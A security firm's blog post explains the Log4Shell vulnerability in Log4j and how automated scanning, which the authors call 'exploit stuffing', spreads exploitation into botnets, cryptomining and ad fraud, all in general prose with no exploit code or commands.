Exploit Stuffing, Log4Shell, and Automation

Researchers: Ryan Castellucci, Elif Kaya, Michael McNally, H Sandford, Adam Sell, Joe Tallett

In this post:

  • Why NIST rated the Log4Shell vulnerability in Apache’s Log4j a 10/10 in severity.
  • The growing trend—and potential impacts—of exploit stuffing.
  • What is the role automation plays in exploit stuffing and in Log4j-related attacks?

When a new exploit—a mechanism for breaking software or hardware and forcing it to do something unintended or unexpected—is discovered, the National Institute of Standards and Technology will review the way that the exploit works, how widespread the exploit has the potential to expand, and how much damage it has the potential to cause. With all of that information, NIST assigns the exploit a score on a scale of zero to ten, with ten being “critical”.

A ten on the NIST scale for vulnerabilities suggests that the exploit is genuinely dangerous: there’s a real potential for abuse, and the impacts of that abuse could be significant. And tens on the NIST scale aren’t given out arbitrarily; they’re identified using an equation incorporating a number of variables, including how easily the vulnerability might be exploited, whether the vulnerability requires certain permissions on the target system, how complex the process would be to complete, and other elements.

All of this is a prologue for the following: when Log4Shell—the hottest topic in cybersecurity for over a month now—was reviewed by NIST, it was ranked a 10/10. In fact, it’s ranked highly on the scale multiple times, as early patches put out to resolve the problem turned out not to cover all contingencies.

(To clarify a common misconception, Log4Shell is the common name for a series of vulnerabilities associated with the Log4j service.)

There’s a great deal of excellent coverage already in the world of what Log4Shell is and how it exploits Log4j, so we here at HUMAN wanted to take a different approach: rather than rehash what you may already know, we wanted to discuss it in the context of the growing use of automation in cyber attacks:

  • What is the role that bots can and will have with respect to Log4Shell?
  • How do exploits participate in the creation of new botnets?
  • What corners of the universe that HUMAN has visibility into could a vulnerability like Log4Shell impact?
  • What does HUMAN see as the future of exploits like Log4Shell?

The answers to these questions help underscore the threat that unchecked and unmitigated automation poses to cybersecurity and other industries.

What is the role that bots can and will have with respect to Log4Shell?

The very short answer to this question is: anything worth doing on the internet is worth doing many, many times over at scale. If a cybercriminal is able to take advantage of the Log4Shell exploit of Log4j to remotely execute code on a device, it will be worth it to them to scale that operation up and do it thousands or millions of times over across the internet, searching for new victims by testing an exploit against every site possible.

But, as you might imagine, doing it by hand thousands or millions of times over isn’t realistic or efficient. And here is where bots first come into the picture: cybercriminals can use bots to automate the process of discovering where the Log4JShell exploit might succeed.

Finding where an exploit might be applicable is the first step of what’s called the Cyber Kill Chain. Lockheed Martin developed the framework, which outlines the steps that cybercriminals take in carrying out an attack and is used in cybersecurity frameworks like MITRE’s ATT&CK. The first step in that framework is called “reconnaissance”, and describes the process of identifying a target, the best mechanism of attack, and the plan and timing for doing so. It can be one of the most time-consuming elements of a cybercriminal’s work, as one wrong move in this phase and the attack is stymied, or worse, the bad actor reveals enough to be caught.

Automating this process of victim-hunting speeds up the reconnaissance phase of the cyber kill chain dramatically. And the shorter that phase of the process, the more victims a cybercriminal can attack. It becomes a tactic in and of itself, using bots to find potential victims of newly-discovered vulnerabilities.

This tactic, which we call exploit stuffing (named for its loose similarity to credential stuffing, a tactic by which cybercriminals attempt to break into user accounts using a set of leaked or stolen credentials), is not unprecedented. Over the past three years, HUMAN has observed an increase in exploit stuffing where bad actors are moving directly to the exploitation phase for common services such as Microsoft Exchange, Citrix Pulse Secure VPN, F5 BIG-IP VPN, and Atlassian Confluence.

In each of these instances, the vulnerabilities within the tools were exploited rapidly and widely. Many of the attacks come from malware which already has a ready-to-go group of scanners and infection-capable devices (often available because of other, existing bot networks), which can be updated remotely to include new exploit capabilities.

How do exploits participate in the creation of new botnets?

Here’s part two of the bot problem as it pertains to Log4Shell and other exploits. The nature of the Log4j-targeted exploit means an attacker can execute code on the targeted system. It’s called remote (or arbitrary) code execution, and it’s one of the most insidious attacks that can happen. Other vulnerabilities associated with other apps may allow attackers to remotely execute code on personal devices, including desktops, mobile devices, IoT devices, or CTV.

It’s not always, however, in a cybercriminal’s best interest to go ahead and carry out a full-fledged, lock-you-out-of-everything attack of your computer in this way. Doing so lets you know that something is very wrong, and that limits the amount of time that a cybercriminal can take advantage of the exploit. So instead, they execute code that allows them to take control of part of your computer, often a part that you can’t even see. They might operate in the background, stealing the resources that your computer has available to it. Or they might simply hunt for data available on your computer to resell later.

One common example of how a cybercriminal can use your computer against you is through cryptomining. The code they execute deposits a small, invisible app on your computer that will—totally in the background, mind you—compute complex mathematical equations with the goal of creating (“mining”) cryptocurrencies. Indeed, many of the botnets associated with early exploitation of Log4Shell are doing so to create cryptomining networks.

What we here at HUMAN are on the lookout for, however, is another possible result of exploit stuffing: new botnets. If, instead of depositing malware for cryptomining, the cybercriminal dropped off a Trojan set up to run commands at some point in the future, then we’re off to the races. Not to mention that getting in the door is just step one for an attacker. Attackers often pivot their goals and tactics once the foothold is established. Cryptomining might be the most lucrative payload today, but tomorrow, it might be one or another flavor of ad fraud.

Consider that in many of the investigations centered on ad fraud published by the Satori Threat Intelligence and Research Team, the culprit is code hidden within an app and covering the tracks of fraudulent activity taking place in the background. Exploit stuffing—especially exploits that enable remote code execution—makes it even easier for the cybercriminals, as they don’t need to rely on social engineering to get a fraudulent app onto the device. The apps with vulnerabilities may be core to your work or personal lives, or be pre-installed on your device.

Which is to say, diligence about password hygiene and software downloads may not be enough to protect you from an exploit stuffing attack. For example, the exploit of Log4j existed as a vulnerability for years before it was identified and disclosed in late 2021.

What corners of the universe that HUMAN has visibility into could a vulnerability like Log4Shell impact?

Realistically, it’s all of them. The nature of this vulnerability means there’s no corner of the internet that’s not worth it for a cybercriminal to pursue. The code deposited and executed by an exploit like Log4Shell can feasibly carry out fraudulent activity or traffic in myriad realms. And that’s a big part of why it ranked a 10/10 on the NIST scale: the Log4Shell vulnerability gives cybercriminals a roadmap to getting into a system, but doesn’t put guardrails on what they can do once they’re there.

Exploits worth a cybercriminal’s time for an exploit stuffing attack often, as noted above, center on apps that are critical to doing business. Revisit the list above - Microsoft Exchange, Atlassian Confluence, various VPNs…these are important elements for a distributed, modern workforce. Vulnerabilities within these crucial applications could—and do—have far-reaching effects.

But it’s not limited to business apps. The notoriety of Log4Shell should raise the alarm, too, for our friends in the advertising technology ecosystem. Often, a cybercriminal’s first entry point into an environment isn’t the system they want to end up controlling. So they’ll get in via whatever door is open to them, and once inside, use the rest of their cybercriminal tool kit to gain greater privileges and move to other systems. It’s called lateral movement in the cybersecurity world, and it’s where a key threat to the advertising technology ecosystem lies.

After all, it’s not very many jumps within an advertising ecosystem to get from a system vulnerable to an exploit stuffing attack to a system with a treasure trove of personal and sensitive information. In fact, the Federal Trade Commission is warning businesses that they have to respond to the Log4Shell vulnerability or face potential legal action. 

What does HUMAN see as the future of exploits like Log4Shell?

Buckle up, because exploit stuffing as an attack mechanism isn’t going anywhere. What Log4Shell has demonstrated is that the right vulnerability can be incredibly attractive to cybercriminals looking to expand their repertoire. And while not every vulnerability will have the potential reach and damage of Log4Shell, the possibility of a cybercriminal automating the reconnaissance process to get inside a system and then automating lateral movement in search of paydirt is noteworthy.

Exploit stuffing is and will remain a major cybersecurity threat for 2022 and beyond. It’s unfortunate that it took a vulnerability the severity of Log4Shell to help raise it to the public cyber-zeitgeist, but if there’s a silver lining to be found, it’s that the increased awareness will spur organizations to find ways to prevent the impacts of exploit stuffing.

Exacerbating the problem is that the majority of the exploit stuffing attacks associated with Log4Shell are fairly rudimentary, not tailored to a target or making a substantial effort to customize parameters to avoid detection. The next wave of attacks centering on Log4Shell—and indeed, on other exploits—will almost certainly be more sophisticated and targeted in nature, making prevention that much harder.

And while automation is not a part of the exploits themselves, it is a key part in how a cybercriminal can scale up an operation predicated on these exploits. Identifying automation is, subsequently, a critical element to curbing the impacts of exploit stuffing.